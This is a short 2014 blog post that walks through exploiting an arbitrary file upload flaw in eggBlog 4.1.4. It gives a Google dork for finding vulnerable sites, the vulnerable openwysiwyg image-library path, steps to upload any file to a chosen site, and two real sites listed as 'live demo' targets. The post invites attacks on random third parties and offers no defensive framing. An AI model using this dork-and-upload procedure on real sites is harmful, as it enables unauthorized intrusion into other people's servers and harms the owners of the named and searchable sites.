Wednesday, 12 February 2014

Exploit eggBlog 414 Arbitrary File Upload



Finding Vulnerable Target

Dork: "powered by eggBlog.net"

Exploit : /_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=

1- Copy the dork and paste on Google

2- Choose any site

Exploiting Target

1- Paste the exploit at the end of the URL.

Example:

www.site.com/index.php?id=12

become

www.site.com/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=

and you will see something like this


2- Choose your file and click Upload.

3- To view your file, simply click on your file name in the upper right box.

Live Demo:

http://www.cn-blue.com/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=

http://www.mrcromwellsattic.com/blog/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=